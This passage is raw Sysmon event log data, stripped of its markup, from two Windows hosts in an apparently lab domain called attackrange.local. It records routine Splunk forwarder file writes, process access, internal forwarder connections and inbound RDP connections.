09:08:31.490{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58126-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978185Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:35.535{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9686F4178992C78BFA2BF0E79A26B7BC,SHA256=767FFC1F36FB2ABDAA6AD70DDA623E928791413A071C72B49293ED67394664AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049492Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:35.739{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=162B9D4FE616912ADD1C839976E714F9,SHA256=13182B41B9E42A447A7B3B67BBFB9B4C760E2D60B3E7F946965B98731635E435,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049494Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:36.776{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB252BDB5BC18A1139E776E2933CFABE,SHA256=7E77CAE5977E74F5EC4912A96D0520E6B8AE210E38A94CAD0D7BADA2DA6FAEA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978186Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:36.535{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B7D5FB365CB33399B6BC40A09A2B85E,SHA256=5643D398EF362E9249AE20B604C0D61AE59BF831BBF27F2BB62B0386797D3D90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049493Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:36.559{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049495Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:37.786{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A83FB9E66DD59817A839B94CA1AFD4D5,SHA256=504F2551AF2DA65BFEF6E53A062708C131A547A3EE1D6CA6E80DD194E65AF399,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978201Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.581{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A15-6151-B179-00000000FD01}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978200Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.581{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978199Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.581{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978198Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.581{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978197Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.581{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978196Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.581{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978195Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.581{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978194Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.581{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978193Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.581{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978192Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.581{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978191Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.581{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8A15-6151-B179-00000000FD01}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978190Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.581{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A15-6151-B179-00000000FD01}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978189Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.567{69CF5F33-8A15-6151-B179-00000000FD01}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978188Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.550{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8A0089D650E2FBA1439CF5EBF227627,SHA256=BF6347F70E6DDC0E052E25E46F48D78C5522BE355A0A25B06291C2A8D24E5D4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978187Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:37.097{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76C8901C2A384A2712ADAF2DB23269B8,SHA256=CEAC428804B186105B1EB826F0391C94F8C808BC89295A48B22D1D9F35EFCBA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049498Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:38.816{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=265039CE2AF1F2B6558CB1C5C12A5B2F,SHA256=BFC3AF5B3FEFC3640E865E049E06B9A3393FF2C9294EEC4BE716E3FEA8316593,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978204Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:38.800{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78F4A940B1058B9B589C9E2813922CD6,SHA256=423D5347F7726CF21202730591404A7A1431EBB9659AF423614D34E5338779FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978203Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:38.566{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD4EB902329214B8EFCC56C1CD94297C,SHA256=9242BBF05917B9A148D57C58AC2FAD55D46523F6E68F25FAE8613DC44E53F8C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049497Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:36.230{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53315-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x80000000000000001049496Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:34.831{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53314-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000978202Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:34.407{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54759-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001049500Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:39.848{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45216E8738DFB7DB1EA564FE1674BCF1,SHA256=A09C6BC49C8D9BC0E00BF15ED05DDEE1AD4B07045CEBA288752DDA71308E746D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978205Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:39.566{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF54560610B5EB4030937F5114D43A14,SHA256=BD79BCCABA87E071CA8D2C35BE41A4EDC836E84D61AD83DC2989C7A600CE131C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049499Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:39.248{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4363A780EF84396CE4EFA4DC5F116851,SHA256=37657D50EB1184C48417B49AF849123696CAC62F7D5A8922DC48B5805F9FAB0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049501Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:40.865{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B93E3445B32387BA4D812F6EAAAB6DF,SHA256=28A2BB74585338796EFBDBEE4C287F35B856165DC15978B26BA3B95223F2791D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978207Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:40.581{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4B9266714A15622E815412AC6EE2899,SHA256=3A4FABD9D07C2045DF471626708011B0B0D2868DC2D173CCE02146D1812DB983,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978206Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:36.741{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59347-false10.0.1.12-8000- 23542300x80000000000000001049502Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:41.915{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EECCDFED8294325578A21637CACE7A5,SHA256=6085DBD9637E2964F036A1238DCAB620FAB95910ACB6545EBFDAC58B34484199,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978208Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:41.581{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=418646F2B7C405460B065847423F8DDA,SHA256=13D09A78727BF2284FE34A5B0CB7B860868D03CB7E56098DF2F919198714E559,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049504Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:42.945{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E982B2B2509595BC50350CE693FE9AC0,SHA256=A9B35CDE5341B598AF056A27492D29C39F7C8BF110C6411DE20DB37752FFD9FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978210Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:42.581{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ACB0213A916AFC25360FFD2BB672D3E,SHA256=9FD327FE996B8B895B9619712C45FB650847348B65F22FBA6414AFCAF61EC795,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049503Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:39.939{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53316-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000978209Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:42.003{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0770B3213D128BB08B9D2CFD0AE7BD72,SHA256=C4A5B408B1C08D30A0F779DE27228FA8DCD4CF6E58FE45FE59A989081A6ED523,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978212Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:43.586{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 